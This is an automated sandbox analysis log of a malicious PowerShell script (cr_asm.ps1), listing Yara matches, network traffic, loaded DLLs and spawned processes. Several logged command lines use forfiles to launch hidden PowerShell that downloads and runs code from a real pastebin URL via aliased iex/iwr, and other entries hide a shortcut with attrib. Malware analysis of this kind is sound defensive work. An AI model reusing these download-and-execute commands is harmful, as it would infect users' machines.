Source: powershell.exe, 00000008.00000002.2519977279.0000029CD89B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.00000149270B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000008.00000002.2519977279.0000029CD89B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.00000149270AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.00000149270B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000008.00000002.2519977279.0000029CD8A53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014927176000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000000.00000002.2336301168.000001CA369F4000.00000004.00000800.00020000.00000000.sdmp, cr_asm.ps1String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll
Source: powershell.exe, 00000008.00000002.2519977279.0000029CD89FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD89D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.00000149270CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.00000149270F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49764 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49771 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.5:49812 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.5:49847 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_5424.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_1196.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4144, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5424, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1196, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E7C9F20_2_00007FF848E7C9F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E7BC460_2_00007FF848E7BC46
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848E8B9668_2_00007FF848E8B966
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848E8C7128_2_00007FF848E8C712
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848E8D1B18_2_00007FF848E8D1B1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848E8B3E08_2_00007FF848E8B3E0
Source: amsi64_5424.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_1196.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4144, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5424, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1196, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: powershell.exe, 00000000.00000002.2334944352.000001CA34860000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBP
Source: classification engineClassification label: mal84.troj.evad.winPS1@16/15@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l32kjgmw.djo.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
